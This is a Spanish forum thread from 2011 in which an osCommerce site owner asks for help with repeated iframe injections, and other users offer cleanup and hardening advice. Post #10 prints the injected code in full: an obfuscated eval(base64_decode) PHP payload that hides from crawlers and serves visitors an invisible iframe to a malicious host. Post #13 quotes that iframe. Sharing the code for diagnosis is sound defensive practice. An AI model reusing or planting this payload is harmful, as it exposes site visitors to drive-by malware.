Sitio hackeado

exuus · #1 (**permalink**) 21/02/2011, 12:01

Buenos días,

No sé si este foro sea el correcto, agradeceré que muevan el tópico si no corresponde aquí.

Tengo un sitio el cual me están hackeado desde hace días, en mi página de inicio están colocando un iframe apuntando a otro sitio (de hacking) y aunque lo quito a diario me lo siguen colocando, ya cambié la contraseña a una más segura, revisé que no haya directorios o archivos con permisos 777 pero siguen entrando a modificar mis archivos.

Google me notificó que me van a penalizar si no quito este código.

¿Alguien puede orientarme sobre donde se pueden estar colando a mi web?

Mil gracias, saludos.

gVenom · #2 (**permalink**) 21/02/2011, 12:04

Lo primero en tu caso es informar a tu proveedor de servicio para que desde alla realicen una limpieza del sistema. Algunas cosas no las podemos quitar desde nuestro panel de control.
Luego, como ya lo hiciste, cambiar a una contraseña muy fuerte. Ya con eso deberias quedar libre.

WebTech · #3 (**permalink**) 21/02/2011, 12:45

Cita:

¿Alguien puede orientarme sobre donde se pueden estar colando a mi web?

Si no hay permisos excesivos, ya tienes una contraseña fuerte. Restan un par de cosas:

1.- Que tu proveedor investigue y vea de qué forma se modifica el archivo, si por ftp, por apache, etc.

2.- Limpia tu PC de spyware/malware, muchas veces tienes algún bicho en tu máquina que loguea todo lo que escribes, como passwords (incluso los nuevos, que cambias) de ftp y demás, que pueden llevar a futuros hackeos.

3.- Analiza la programación de tu web, quizás tienes algún bug en el código que permite la inyección de cadenas de código.

4.- Si es un script comercial, asegúrate de tenerlo al día, actualizado al 100%, al igual que sus módulos.

Saludos,

atlanticadigital · #4 (**permalink**) 22/02/2011, 06:51

Que aplicacion estas corriendo en el dominio? Por ejemplo si utilizas oscommerc, este tiene muchisimos problemas de este tipo y tendrias que proteger las carpetas del servidor con clave, ademas de pensar en cambiar de aplicacion.

Si no es este el caso tal como te indicaron antes es muy importante que revises tu pc, muchas veces software warez descargados de internet e instalados en la pc provocan este tipo de problemas. Revisa bien tu pc y elimina cualquier spyware o malware que tengas.

Saludos.

infracom2005 · #5 (**permalink**) 22/02/2011, 16:35

verifica también tu pc en busca de phishing.

WebTech · #6 (**permalink**) 23/02/2011, 03:25

Cita:

Iniciado por infracom2005

verifica también tu pc en busca de phishing.

Nunca había escuchado que el phising podía ocurrir en la propia PC del usuario

¿no querrás decir virus/malware/spyware?

El phising siempre corre via internet, no a nivel de localhost (ya que el 99% de los usuarios no tienen servidores webs corriendo sobre sus máquinas), en webs que pretenden hacerse pasar por otras, cosa que sucede muy frecuentemente con bancos, entidades de dinero, tarjetas de crédito, etc.. pero nunca con empresas de hosting así que yo descartaría el phising como posible causa.

Saludos,

peruserver · #7 (**permalink**) 23/02/2011, 11:44

Es muy probable que la PC de la victima sea la del problema. Si usas antivirus usa originales no copias, pues ellos también podrian ser la causa. Si el virus/troyano está en tu pc, asi cambies la contraseña 100 veces, las 100 veces te van a dar problemas.

HOSTBURN · #8 (**permalink**) 23/02/2011, 11:58

EXXUS, utilizas algun prefabricado en la web? lo tienes actualizado?

exuus · #9 (**permalink**) 23/02/2011, 20:26

Gracias por las respuestas, utilizo Oscommerce actualizado y mi PC la mantengo sana con antivirus original (NOD32), he cambiado la contraseña pero el problema persiste, todos los días borro el código inyectado y archivos que han subido.

exuus · #10 (**permalink**) 23/02/2011, 20:28

Este es el código que están inyectando en el index:

Código PHP:

Ver originaleval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9nZGVnaHNuZnhuLmNvLmNjL1FRa0ZCZzBBQVEwTUJBMERFa2NKQlFZTkF3Y0NBUU1NQXc9PSIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC9pZnJhbWU+JzsNCn0='));

elvisoftweb · #11 (**permalink**) 23/02/2011, 21:06

Otro consejo que tambien te daria es que visites esta web: www.antivirusya.com
Alli encontraras un sinfin de consejos y antivirus para descargar y gratis por otro lado el mejor antivirus que te puedo aconsejar es el AVG

Saludos espero te sirve mi consejo

JoshMex · #12 (**permalink**) 24/02/2011, 07:45

Verifica que en la base de datos no esté también insertado el código

exuus · #13 (**permalink**) 24/02/2011, 21:41

Me están insertando también este iframe en el index:

Código HTML:

Ver original<iframe src="http://4ahesrhdsahfh.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>

WebTech · #14 (**permalink**) 25/02/2011, 05:45

Oscommerce desde hace un tiempo está bastante vulnerable y las actualizaciones son cada vez menos frecuentes. Te sugerirìa ir pensando en migrar a Prestashop o alguna otra plataforma de e-commerce. Mientras tal vez esto te venga bien: How to secure your OsCommerce

Saludos,

jam666 · #15 (**permalink**) 25/02/2011, 12:36

Cita:

Iniciado por exuus

¿Alguien puede orientarme sobre donde se pueden estar colando a mi web?

- Revisa los .htaccess en busca de código extraño o cambios que tu no hayas realizado.
- Revisa también los logs de acceso FTP.

Saludos.

peruserver · #16 (**permalink**) 26/02/2011, 01:13

En un topico en este mismo foro se comentó sobre el tema, OSCOMMERCE ya no es recomendable, es demasiado vulnerable a nivel de seguridad.

quetevendo · #17 (**permalink**) 01/03/2011, 07:45

Cita:

Iniciado por peruserver

En un topico en este mismo foro se comentó sobre el tema, OSCOMMERCE ya no es recomendable, es demasiado vulnerable a nivel de seguridad.

Me Molesta que se ande despretigiando a una programacion como oscommerce simplemente por desconocimiento o descuido de personas que instalan versiones con permisos 777 y con administradores desprotegidos... te puedo decir que los ataques a osco son los mismo que para joomla, y demas cms y e-shop.

Hay un parche con 5 cambios que deja todo OK.. entonces me parece que no estas informado...

Ademas salio en Noviembre la version 2.3.1 que esta completamente blindada....

ahhh y para todos lo que se mofaban en mes y medio mas tenemos al bebé final y cuidado porque se las trae!!!

Creo que llego la hora de que muchos se muerdan la lengua por haber dicho cualquier verdura!!!

Antes de opinar y decir me dijeron, me recomendaron, alguien dijo... lei por ahí.... hay que saber de la programacion, estar empapado y tener autoridad para responder antes de desprestigiar...

Solo mi opinion!!

Saludos

quetevendo · #18 (**permalink**) 21/03/2011, 08:18

Soy una persona de hechos y no de dichos y que sustenta lo que afirma...

Queria comuinidad me complace en presentarles este anuncio en 10 dias mas la version definitiva de oscommerce 3.0 con lo mejor de lo mejor... pasa al frente en cuestion de meses y no hay nadie que ofrezca algo similar...

Aca un adelantito: http://www.shinyredapples.com/post/3...ntdown-to-v3-0

Saludos

atlanticadigital · #19 (**permalink**) 21/03/2011, 11:46

Perfecto !!! Espero que con esta nueva version se solucionen los problemas de seguridad que traian las anteriores.
Sabes si tiene algun modulo para actualizar desde versiones viejas? Habra mucha gente interesada en esto.

Saludos y gracias por compartir.